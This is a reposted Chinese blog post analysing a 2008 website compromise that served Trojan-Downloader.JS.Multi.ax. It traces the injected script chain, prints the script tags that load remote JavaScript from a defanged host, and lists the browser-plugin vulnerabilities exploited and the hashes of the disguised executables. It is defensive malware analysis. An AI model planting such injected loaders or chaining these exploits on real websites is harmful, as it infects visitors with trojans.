一个挂马Trojan-Downloader.JS.Multi.ax的网站
来源:互联网 发布:网络主播结束语 编辑:程序博客网 时间:2024/04/28 19:31
一个挂马Trojan-Downloader.JS.Multi.ax的网站
endurer 原创
2008-03-24 第1版
打开该网站,Kaspersky报告已检测到: 木马程序 Trojan-Downloader.JS.Multi.ax URL: hxxp://ad**.sh**i*t**ip.com/file/ad.js
下载 HttpRead 来进行分析。
首先检查该网站代码,发现:
/---
<script src="../../../ads/iw_t.js"></script>
---/
1、ads/iw_t.js 包含代码:
/---
<script src='/images/jin.gif'></script>
---/
1.1、/images/jin.gif 包含JavaScript脚本文件,功能是:检测Cookie变量my_ad,如果不存在则创建,并输出代码:
/---
<script language="javascript" src="hxxp://ww**.sh**i*t**ip.com/file/my.js"></script>
---/
1.1.1 hxxp://ad**.sh**i*t**ip.com/file/ad.js 输出:
1.1.1.1 hxxp://ww**.sh**i*t**ip.com/file/gdisvc.htm
利用 MS-0614漏洞 下载 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg 存为 gdisvc.exe,下载 hxxp://ww**.sh**i*t**ip.com/file/images/top.jpg 存为 top.exe
文件说明符 : D:/test/gdisvc.jpg
属性 : A---
语言 : 中文(中国)
文件版本 : 51.2600.2180
说明 : Microsoft(R) Windows(R) Operating System
版权 : C) Microsoft Corporation. All rights reserved.
备注 : Microsoft(R) Windows(R) Operating System
产品版本 : 51.2600.2180
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : csrss
源文件名 : csrss.exe
创建时间 : 2008-3-24 13:7:47
修改时间 : 2008-3-24 13:7:47
访问时间 : 2008-3-24 13:9:52
大小 : 20992 字节 20.512 KB
MD5 : 7de7e5ff1faa846360223f57046e7931
SHA1: E4E3A23B8153219988F3F43947379A3DA9991B26
CRC32: 813e1f71
文件说明符 : D:/test/top.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-3-24 13:7:47
修改时间 : 2008-3-24 13:7:47
访问时间 : 2008-3-24 13:8:51
大小 : 26524 字节 25.924 KB
MD5 : c9c9a6bc94a773da9a41df078d65c765
SHA1: BC8076757E1B89BB6AE5603F135FB1A4D0F13835
CRC32: 7471d8eb
1.1.1.2 hxxp://ww**.sh**i*t**ip.com/file/xunlei.htm
利用迅雷(PPlayer.XPPlayer.1)漏洞下载、运行 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.3 hxxp://ww**.sh**i*t**ip.com/file/real.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载、运行 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.4 hxxp://ww**.sh**i*t**ip.com/file/lz.htm
利用 联众(GLCHAT.GLChatCtrl.1)漏洞下载、运行hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.5 hxxp://ww**.sh**i*t**ip.com/file/bf.htm
利用 暴风影音(MPS.StormPlayer) 漏洞下载、运行hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.6 hxxp://ww**.sh**i*t**ip.com/file/pps.htm
利用 PPStream(POWERPLAYER.PowerPlayeCtrl.1) 漏洞下载、运行hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
1.1.1.7 hxxp://ww**.sh**i*t**ip.com/file/sdr.htm
利用 超星阅览器 漏洞下载、运行 hxxp://ww**.sh**i*t**ip.com/file/images/gdisvc.jpg
- 一个挂马Trojan-Downloader.JS.Multi.ax的网站
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 一个下载Trojan-Downloader.Win32.Delf.ajm,技术比较新奇的网页
- 某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
- 一个会下载 Trojan.DL.Agent.wzr 的政府网站
- 一个传播Trojan.Win32.Agent.aac的网站
- 某市发改委网站被挂马 xzz.exe/Trojan-Downloader.Win32.Delf.aof
- 巴马某神酒业有限责任公司网站被挂马Worm.Win32.Downloader/Trojan.Win32.Mnless
- 某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
- 恢复被"Trojan-Downloader.Win32.Agent.ben"感染的exe文件
- ARP病毒加的网址传播Trojan-Downloader.Win32.Delf.bjy
- RootKit.Win32.RESSDT.o/Trojan-Downloader.Win32.Agent.mjp 的一点分析
- 修改系统日期、替换explorer.exe的Trojan-Downloader.Win32.Agent.rjq1
- 在应用程序中使用 Ajax 的时机
- 2.12 注释
- 给PHP加速,eAccelerator配置和使用指南
- 目录结构设计
- 2.11 匹配选项
- 一个挂马Trojan-Downloader.JS.Multi.ax的网站
- php 开源项目 大全
- 获取当前打开Word文档的名字和路径以及取消自己添加的目录菜单
- HTML拖放表格
- Testing the User Interface - Using DotNetMock
- xp sp2 IIS5.1 错误"服务器应用程序不可用"
- Lightweight UI Test Automation with .NET
- java对象的集合上
- IDENTITY_INSERT 设置为 OFF 时 ...不能向表 '' 中的标识列插入显式值。
